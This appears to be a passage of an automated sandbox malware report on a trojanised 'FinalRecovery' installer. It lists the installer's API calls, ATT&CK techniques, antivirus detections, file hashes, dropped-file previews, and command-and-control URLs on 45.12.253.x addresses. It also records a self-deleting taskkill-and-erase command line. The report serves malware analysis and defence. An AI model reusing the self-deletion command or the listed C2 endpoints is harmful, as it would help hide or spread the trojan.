              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: 2_2_0044028F mov eax, dword ptr fs:[00000030h]
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: 2_2_0042039F mov eax, dword ptr fs:[00000030h]
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: 2_2_004429E7 mov eax, dword ptr fs:[00000030h]
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: 2_2_00417B2F mov eax, dword ptr fs:[00000030h]
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: 2_2_10007A06 mov eax, dword ptr fs:[00000030h]
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: 2_2_10005EB5 mov eax, dword ptr fs:[00000030h]
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: 2_2_0040F709 SetUnhandledExceptionFilter,
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: 2_2_004132EB IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: 2_2_0040F575 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: 2_2_0040EB52 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: 2_2_10005630 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: 2_2_10002A85 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: 2_2_10002F80 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
              Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmpCode function: 1_2_00476C24 ShellExecuteEx,GetLastError,MsgWaitForMultipleObjects,GetExitCodeProcess,CloseHandle,
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /im "finalrecovery.exe" /f
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /im "finalrecovery.exe" /f & erase "C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe" & exit
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /im "finalrecovery.exe" /f
              Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmpCode function: 1_2_0042DF9C AllocateAndInitializeSid,GetVersion,GetModuleHandleA,GetProcAddress,CheckTokenMembership,GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,GetTokenInformation,EqualSid,CloseHandle,FreeSid,
              Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoA,
              Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoA,
              Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmpCode function: GetLocaleInfoA,
              Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmpCode function: GetLocaleInfoA,
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: GetKeyboardLayoutList,GetLocaleInfoA,__Init_thread_footer,
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: EnumSystemLocalesW,
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: EnumSystemLocalesW,
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: EnumSystemLocalesW,
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: GetLocaleInfoW,
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: GetLocaleInfoW,
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: GetLocaleInfoW,
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: EnumSystemLocalesW,
              Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exeCode function: 2_2_0040F773 cpuid
              Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmpCode function: 1_2_00457964 GetTickCount,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetCurrentProcessId,CreateNamedPipeA,GetLastError,CreateFileA,SetNamedPipeHandleState,CreateProcessA,CloseHandle,CloseHandle,
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004026C4 GetSystemTime,
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00405CBC GetVersionExA,
              Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmpCode function: 1_2_004547B8 GetUserNameA,

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: 2.2.finalrecovery.exe.400000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.finalrecovery.exe.3250000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.finalrecovery.exe.3250000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.finalrecovery.exe.400000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000002.00000002.323772698.0000000003250000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.323409231.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
              Valid Accounts1
              Windows Management Instrumentation
              Path Interception1
              Exploitation for Privilege Escalation
              1
              Disable or Modify Tools
              1
              Input Capture
              1
              System Time Discovery
              Remote Services1
              Archive Collected Data
              Exfiltration Over Other Network Medium2
              Ingress Tool Transfer
              Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
              System Shutdown/Reboot
              Default Accounts3
              Native API
              Boot or Logon Initialization Scripts1
              Access Token Manipulation
              11
              Deobfuscate/Decode Files or Information
              LSASS Memory1
              Account Discovery
              Remote Desktop Protocol1
              Input Capture
              Exfiltration Over Bluetooth2
              Encrypted Channel
              Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
              Domain Accounts12
              Command and Scripting Interpreter
              Logon Script (Windows)12
              Process Injection
              3
              Obfuscated Files or Information
              Security Account Manager2
              File and Directory Discovery
              SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
              Non-Application Layer Protocol
              Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
              Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)23
              Software Packing
              NTDS26
              System Information Discovery
              Distributed Component Object ModelInput CaptureScheduled Transfer11
              Application Layer Protocol
              SIM Card SwapCarrier Billing Fraud
              Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script2
              Masquerading
              LSA Secrets141
              Security Software Discovery
              SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
              Replication Through Removable MediaLaunchdRc.commonRc.common1
              Access Token Manipulation
              Cached Domain Credentials2
              Process Discovery
              VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
              External Remote ServicesScheduled TaskStartup ItemsStartup Items12
              Process Injection
              DCSync11
              Application Window Discovery
              Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
              Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem3
              System Owner/User Discovery
              Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 791301 Sample: file.exe Startdate: 25/01/2023 Architecture: WINDOWS Score: 92 48 45.12.253.98 CMCSUS Germany 2->48 50 Snort IDS alert for network traffic 2->50 52 Detected unpacking (changes PE section rights) 2->52 54 Detected unpacking (overwrites its own PE header) 2->54 56 3 other signatures 2->56 10 file.exe 2 2->10         started        signatures3 process4 file5 32 C:\Users\user\AppData\Local\Temp\...\file.tmp, PE32 10->32 dropped 60 Obfuscated command line found 10->60 14 file.tmp 18 16 10->14         started        signatures6 process7 file8 34 C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+ 14->34 dropped 36 C:\Users\user\AppData\Local\...\_iscrypt.dll, PE32 14->36 dropped 38 C:\Users\user\AppData\Local\...\_RegDLL.tmp, PE32 14->38 dropped 40 6 other files (5 malicious) 14->40 dropped 17 finalrecovery.exe 24 14->17         started        process9 dnsIp10 42 45.12.253.56, 49707, 80 CMCSUS Germany 17->42 44 45.12.253.72, 49708, 80 CMCSUS Germany 17->44 46 45.12.253.75, 49709, 80 CMCSUS Germany 17->46 30 C:\Users\user\AppData\...\6tohc1clzbcir.exe, PE32 17->30 dropped 21 6tohc1clzbcir.exe 17->21         started        24 cmd.exe 1 17->24         started        file11 process12 signatures13 58 Multi AV Scanner detection for dropped file 21->58 26 taskkill.exe 1 24->26         started        28 conhost.exe 24->28         started        process14

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              No Antivirus matches
              SourceDetectionScannerLabelLink
              C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe100%Joe Sandbox ML
              C:\Program Files (x86)\FgasoftFR\FinalRecovery\Preview.exe (copy)0%ReversingLabs
              C:\Program Files (x86)\FgasoftFR\FinalRecovery\is-RVFGU.tmp0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\is-EFH65.tmp\_isetup\_RegDLL.tmp0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\is-EFH65.tmp\_isetup\_iscrypt.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\is-EFH65.tmp\_isetup\_setup64.tmp0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\is-EFH65.tmp\_isetup\_shfoldr.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp2%ReversingLabs
              C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\6tohc1clzbcir.exe60%ReversingLabsWin32.Trojan.GenusAgent
              SourceDetectionScannerLabelLinkDownload
              1.2.file.tmp.400000.0.unpack100%AviraTR/Dropper.GenDownload File
              0.3.file.exe.23675c8.1.unpack100%AviraTR/Patched.Ren.GenDownload File
              1.2.file.tmp.4b375c.2.unpack100%AviraTR/Patched.Ren.GenDownload File
              0.3.file.exe.218b608.5.unpack100%AviraTR/Patched.Ren.GenDownload File
              2.2.finalrecovery.exe.400000.1.unpack100%AviraHEUR/AGEN.1250671Download File
              1.0.file.tmp.4b375c.2.unpack100%AviraTR/Patched.Ren.GenDownload File
              0.2.file.exe.400000.0.unpack100%AviraTR/Dropper.GenDownload File
              No Antivirus matches
              SourceDetectionScannerLabelLink
              http://www.innosetup.com/0%URL Reputationsafe
              http://www.innosetup.com/0%URL Reputationsafe
              http://45.12.253.72/default/stuk.php0%URL Reputationsafe
              http://45.12.253.56/advertisting/plus.php?s=NOSUB&str=mixtwo&substr=mixinte0%URL Reputationsafe
              http://www.remobjects.com/psU0%URL Reputationsafe
              http://45.12.253.72/default/puk.php0%URL Reputationsafe
              http://45.12.253.75/dll.php0%URL Reputationsafe
              http://www.finalrecovery.com/buy.htm0%URL Reputationsafe
              http://www.remobjects.com/ps0%URL Reputationsafe
              http://nbafrog.com/b0%Avira URL Cloudsafe
              http://45.12.253.75/dll.phpI0%Avira URL Cloudsafe
              http://45.12.253.72/default/stuk.phpE0%Avira URL Cloudsafe
              http://nbafrog.com/.0%Avira URL Cloudsafe
              http://45.12.253.72/default/puk.phpk0%Avira URL Cloudsafe
              http://nbafrog.com/0%Avira URL Cloudsafe
              No contacted domains info
              NameMaliciousAntivirus DetectionReputation
              http://45.12.253.72/default/stuk.phptrue
              • URL Reputation: safe
              unknown
              http://45.12.253.56/advertisting/plus.php?s=NOSUB&str=mixtwo&substr=mixintetrue
              • URL Reputation: safe
              unknown
              http://45.12.253.72/default/puk.phptrue
              • URL Reputation: safe
              unknown
              http://45.12.253.75/dll.phptrue
              • URL Reputation: safe
              unknown
              NameSourceMaliciousAntivirus DetectionReputation
              http://www.innosetup.com/file.tmp, file.tmp, 00000001.00000000.243074612.0000000000401000.00000020.00000001.01000000.00000004.sdmp, file.tmp.0.dr, is-U89TP.tmp.1.drfalse
              • URL Reputation: safe
              • URL Reputation: safe
              unknown
              http://www.remobjects.com/psUfile.exe, 00000000.00000003.242613252.00000000022C0000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.242766712.00000000020E8000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000000.243074612.0000000000401000.00000020.00000001.01000000.00000004.sdmp, file.tmp.0.dr, is-U89TP.tmp.1.drfalse
              • URL Reputation: safe
              unknown
              http://45.12.253.75/dll.phpIfinalrecovery.exe, 00000002.00000002.323950124.000000000426A000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://45.12.253.72/default/puk.phpkfinalrecovery.exe, 00000002.00000002.323596544.0000000001665000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://nbafrog.com/bfile.tmp, 00000001.00000003.324143463.0000000000782000.00000004.00000020.00020000.00000000.sdmp, file.tmp, 00000001.00000002.324394304.0000000000782000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://www.finalrecovery.com/buy.htmis-587OJ.tmp.1.drfalse
              • URL Reputation: safe
              unknown
              http://45.12.253.72/default/stuk.phpEfinalrecovery.exe, 00000002.00000002.323596544.0000000001665000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://www.remobjects.com/psfile.exe, 00000000.00000003.242613252.00000000022C0000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.242766712.00000000020E8000.00000004.00001000.00020000.00000000.sdmp, file.tmp, file.tmp, 00000001.00000000.243074612.0000000000401000.00000020.00000001.01000000.00000004.sdmp, file.tmp.0.dr, is-U89TP.tmp.1.drfalse
              • URL Reputation: safe
              unknown
              http://nbafrog.com/file.tmp, 00000001.00000003.243532631.0000000002278000.00000004.00001000.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://nbafrog.com/.file.exe, 00000000.00000003.324832803.00000000020E1000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.242527892.00000000020E1000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000002.324490677.0000000002267000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000003.243532631.0000000002278000.00000004.00001000.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs
              IPDomainCountryFlagASNASN NameMalicious
              45.12.253.72
              unknownGermany
              33657CMCSUStrue
              45.12.253.75
              unknownGermany
              33657CMCSUStrue
              45.12.253.98
              unknownGermany
              33657CMCSUStrue
              45.12.253.56
              unknownGermany
              33657CMCSUStrue
              Joe Sandbox Version:36.0.0 Rainbow Opal
              Analysis ID:791301
              Start date and time:2023-01-25 10:01:06 +01:00
              Joe Sandbox Product:CloudBasic
              Overall analysis duration:0h 8m 4s
              Hypervisor based Inspection enabled:false
              Report type:light
              Sample file name:file.exe
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
              Number of analysed new started processes analysed:20
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • HDC enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Detection:MAL
              Classification:mal92.troj.evad.winEXE@12/24@0/4
              EGA Information:
              • Successful, ratio: 100%
              HDC Information:
              • Successful, ratio: 38.5% (good quality ratio 37.4%)
              • Quality average: 81.2%
              • Quality standard deviation: 24.8%
              HCA Information:
              • Successful, ratio: 97%
              • Number of executed functions: 0
              • Number of non-executed functions: 0
              Cookbook Comments:
              • Found application associated with file extension: .exe
              • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
              • TCP Packets have been reduced to 100
              • Excluded domains from analysis (whitelisted): fs.microsoft.com, ctldl.windowsupdate.com
              • Not all processes where analyzed, report is missing behavior information
              • Report creation exceeded maximum time and may have missing disassembly code information.
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
              TimeTypeDescription
              10:02:03API Interceptor1x Sleep call for process: 6tohc1clzbcir.exe modified
              No context
              No context
              No context
              No context
              No context
              Process:C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp
              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
              Category:dropped
              Size (bytes):791040
              Entropy (8bit):6.608982798504157
              Encrypted:false
              SSDEEP:24576:pvfBdvyjNf8cbMtMJjLKRfwaNSkxtkNkYzSYcj0oHyxdpVhNZFGv+56nBb/ExWyt:pBC4rTQnC1QaX4+I
              MD5:5C2FE7D4DDE65810152054F3C93C1815
              SHA1:2A19F3FAA78A5072068F7902DB19A248F11FA69B
              SHA-256:233D846FEB73A38141BDF6C813C7476FA3F66DCD3548338607F3B7CB61CAC730
              SHA-512:2C01AE918044829FC649F0775BF3FFDB417B1524B47CDABFF0C06B6382B6578A742D9C1D036090D7AD1FC3A8B7D563D28C0CDB94DE572BF883389825F73FD654
              Malicious:true
              Antivirus:
              • Antivirus: ReversingLabs, Detection: 0%
              Reputation:moderate, very likely benign file
              Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................|......$.............@..............................................@...........................@...,...0..............................................................................DH...............................text...D{.......|.................. ..`.itext..l........................... ..`.data...l8.......:..................@....bss.....C...............................idata...,...@......................@....tls....4....p...........................rdata..............................@..@.reloc..............................@..B.rsrc........0......................@..@....................................@..@................................................................................................
              Process:C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):1949
              Entropy (8bit):4.915453283427292
              Encrypted:false
              SSDEEP:48:Sik3C0nGTAFE3blB/aMO0Mk2fLXVn7K+eq9hb6Suf:pkvGTAFELlB/A4GXVnWU9BNuf
              MD5:C0AE85DB30FE9027DBBF3BA758FA78BE
              SHA1:95E69DB95504A9F61D090690F32FB5D2F685C604
              SHA-256:CF63BBFD735C18757AC2AA6CB8A14C82745B6158F9FD299BD189D9CA3E7A2DE7
              SHA-512:DA53177074E79F96C1C7E477E0E7B63CD1D2B836DB9E8066F20B60897FC5770D2B16594A84A953A9CD56BD4C0DDB7D5EFBDDF881EEA840D6B106552C5AC6815E
              Malicious:false
              Reputation:moderate, very likely benign file
              Preview:.. F i n a l R e c o v e r y v3.0.7.0325....Overview ..========....FinalRecovery is a powerful and easy-to-use file recovery software. It is suitable ..for various data recovery situations. Some of those situations are listed below. ....1 Recover accidentally deleted files (files were deleted by using windows explorer, .. command line, other software utilities; files which lost while empting recycle .. bin; file losses which caused by unknown reasons); ..2 Recover files from accidentally formatted disk volume; ..3 Recover files from lost partitions (the cases may be partition deletion, disk .. repartitioning, partition losses which caused by virus or other reasons) or .. corruptted partitions; ..4 Recover files from drive image files; ..5 Predict drive failures (doesn't support SCSI hard drives, removable hard drives). ....FinalRecovery supports FAT12, FAT16, FAT32, NTFS, NTFS5 and Raw file system. It can ..recover files from hard disks, floppies, U disks, PCMCIA-
              Process:C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp
              File Type:XML 1.0 document, ASCII text, with very long lines (5978), with CRLF line terminators
              Category:dropped
              Size (bytes):6452
              Entropy (8bit):4.734154041089812
              Encrypted:false
              SSDEEP:96:EonMpdbxw/+9MjLKJ9+LsxS/wV2iderMRyLjQ1WsL+9w/SxEDz8bONAPujBUTjkv:E7nb
              MD5:247D3A0C3B0C53CA33D032A561619495
              SHA1:F30570C48749FE427FACCBDF925048B149D22460
              SHA-256:783AC8FBA1DD88291A4F331EC2459DDE4005CF70FAFB4F19F9061713FFD580EB
              SHA-512:9D18FDC8A32C86A0F8C2BB408A33A71645632289CA0D684B58B98862AA1A67E75258D39C621F4E647753A1480D50444756D125C273B16323A757270CD94B7BBD
              Malicious:false
              Preview:<?xml version="1.0" encoding="UTF-8" standalone="no"?>..<Settings>...<Misc readyinform="True" showdlgonclick="True" adjustmentquery="True"/>...<Enhanced structurematch="False"/>...<FileTypes expand="True">....<Type ext="rar"/><Type ext="zip"/><Type ext="doc"/><Type ext="xls"/><Type ext="ppt"/></FileTypes>...<RawRecovery>....<DefaultSize><Type major="0" minor="0" defaultsize="1" maxsize="20"/><Type major="0" minor="1" defaultsize="1" maxsize="20"/><Type major="0" minor="2" defaultsize="1" maxsize="20"/><Type major="0" minor="3" defaultsize="1" maxsize="20"/><Type major="0" minor="4" defaultsize="1" maxsize="20"/><Type major="0" minor="5" defaultsize="1" maxsize="20"/><Type major="0" minor="6" defaultsize="1" maxsize="20"/><Type major="0" minor="7" defaultsize="1" maxsize="20"/><Type major="0" minor="8" defaultsize="1" maxsize="20"/><Type major="0" minor="9" defaultsize="1" maxsize="20"/><Type major="0" minor="10" defaultsize="1" maxsize="20"/><Type major="0" minor="11" defaultsize="1" m
              Process:C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp
              File Type:XML 1.0 document, ASCII text, with very long lines (5978), with CRLF line terminators
              Category:dropped
              Size (bytes):6452
              Entropy (8bit):4.734154041089812
              Encrypted:false
              SSDEEP:96:EonMpdbxw/+9MjLKJ9+LsxS/wV2iderMRyLjQ1WsL+9w/SxEDz8bONAPujBUTjkv:E7nb
              MD5:247D3A0C3B0C53CA33D032A561619495
              SHA1:F30570C48749FE427FACCBDF925048B149D22460
              SHA-256:783AC8FBA1DD88291A4F331EC2459DDE4005CF70FAFB4F19F9061713FFD580EB
              SHA-512:9D18FDC8A32C86A0F8C2BB408A33A71645632289CA0D684B58B98862AA1A67E75258D39C621F4E647753A1480D50444756D125C273B16323A757270CD94B7BBD
              Malicious:false
              Preview:<?xml version="1.0" encoding="UTF-8" standalone="no"?>..<Settings>...<Misc readyinform="True" showdlgonclick="True" adjustmentquery="True"/>...<Enhanced structurematch="False"/>...<FileTypes expand="True">....<Type ext="rar"/><Type ext="zip"/><Type ext="doc"/><Type ext="xls"/><Type ext="ppt"/></FileTypes>...<RawRecovery>....<DefaultSize><Type major="0" minor="0" defaultsize="1" maxsize="20"/><Type major="0" minor="1" defaultsize="1" maxsize="20"/><Type major="0" minor="2" defaultsize="1" maxsize="20"/><Type major="0" minor="3" defaultsize="1" maxsize="20"/><Type major="0" minor="4" defaultsize="1" maxsize="20"/><Type major="0" minor="5" defaultsize="1" maxsize="20"/><Type major="0" minor="6" defaultsize="1" maxsize="20"/><Type major="0" minor="7" defaultsize="1" maxsize="20"/><Type major="0" minor="8" defaultsize="1" maxsize="20"/><Type major="0" minor="9" defaultsize="1" maxsize="20"/><Type major="0" minor="10" defaultsize="1" maxsize="20"/><Type major="0" minor="11" defaultsize="1" m
              Process:C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp
              File Type:MS Windows HtmlHelp Data
              Category:dropped
              Size (bytes):553405
              Entropy (8bit):7.979175020825392
              Encrypted:false
              SSDEEP:12288:G8kCp81IkXlwDvsttKcoKRWqZPP4owP1G2uQeDyXwaWt:HJp3kXlDvKwRWg4owdGueDiwaWt
              MD5:37E6EEA8C4E469F6439F3790166815DD
              SHA1:E0A3768F291CC7FCE178A001F0356D4FBA29D81F
              SHA-256:606D66026DA226D1AA1C1A4CA6416F3B9F6C66791F4116EB3FFF9E8E28E6B113
              SHA-512:68D3DA77F272A382D800EBB07F02156957CB14C96728896BBB5F6A1E9AEA9A1A5DA4EFCCB09D49096E986A3FCE3F86685B5AFD790887DB28F8F9F5C76D9435A9
              Malicious:false
              Preview:ITSF....`.......&..u.......|.{.......".....|.{......."..`...............x.......T........................q..............ITSP....T...........................................j..].!......."..T...............PMGL................./..../#IDXHDR...Q.../#ITBITS..../#STRINGS.....<./#SYSTEM..F.9./#TOPICS...Q.../#URLSTR...-.a./#URLTBL...a.L./$FIftiMain..._..r./$OBJINST...D.../$WWAssociativeLinks/..../$WWAssociativeLinks/Property...@../$WWKeywordLinks/..../$WWKeywordLinks/Property...<../about.htm..v.../advscan.htm...T.../createimg.htm..m.../enhanced.htm.....H./filetypes.htm...:.-./FinalRecovery.hhc...v./healthdiag.htm..._.[./licence.htm..u.../loadimg.htm..m.../misc.htm...c.m./new.htm..~.o./OptAdv.htm.....+./partiscan.htm....+./quicktutorial.htm...P.8./quicktutorial.swf...3..../rawrecovery.htm...g.4./recover1.htm../.#./recover2.htm..R.../stdscan.htm..p...::DataSpace/NameList..<(::DataSpace/Storage/MSCompressed/Content.....r,::DataSpace/Storage/MSCompressed/ControlData.j.)::DataSpace/Storage/MSCompr
              Process:C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp
              File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
              Category:modified
              Size (bytes):1327103
              Entropy (8bit):6.349641677377942
              Encrypted:false
              SSDEEP:24576:p8sn21M2uJJKYcbmuBm/GAihHJTo+M/FLUTTb2ghAfrZLya6p4ZyQzAp:CsroY6mGAugUlgIbn
              MD5:88A9155EB9D85157634ED38D128C877B
              SHA1:1ED44B28A6652EC52EE93DE9DD18065625938D0B
              SHA-256:919DBDEDBDF4312EF0EF97A94343DEC76EEBA35FD50CE0A8B3885029750FAD06
              SHA-512:4A04B85C7DF8ECCDCF7740EB5B451B0696D3C109308766D4A1BB7288B7A13891AC6023EF81BB1754A97157DDC265AF40660AAB6C0E468FC5A4366A92BFD54E71
              Malicious:true
              Antivirus:
              • Antivirus: Joe Sandbox ML, Detection: 100%
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...5..c..........................................@..........................@....................................................... ..`............................................................................................................text............................... ..`.rdata..:........ ..................@..@.data... ...........................@....tls....!...........................@....rsrc........ ....... ..............@..@.fga20..._......._..................`.7.................................................................................................................................................................................................................................................................................................................................................................................................
              Process:C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp
              File Type:MS Windows HtmlHelp Data
              Category:dropped
              Size (bytes):553405
              Entropy (8bit):7.979175020825392
              Encrypted:false
              SSDEEP:12288:G8kCp81IkXlwDvsttKcoKRWqZPP4owP1G2uQeDyXwaWt:HJp3kXlDvKwRWg4owdGueDiwaWt
              MD5:37E6EEA8C4E469F6439F3790166815DD
              SHA1:E0A3768F291CC7FCE178A001F0356D4FBA29D81F
              SHA-256:606D66026DA226D1AA1C1A4CA6416F3B9F6C66791F4116EB3FFF9E8E28E6B113
              SHA-512:68D3DA77F272A382D800EBB07F02156957CB14C96728896BBB5F6A1E9AEA9A1A5DA4EFCCB09D49096E986A3FCE3F86685B5AFD790887DB28F8F9F5C76D9435A9
              Malicious:false
